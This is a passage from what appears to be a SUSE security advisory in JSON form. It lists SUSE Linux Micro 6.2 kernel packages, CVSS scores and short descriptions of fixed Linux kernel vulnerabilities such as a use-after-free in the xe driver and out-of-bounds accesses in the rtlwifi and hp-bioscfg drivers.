"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
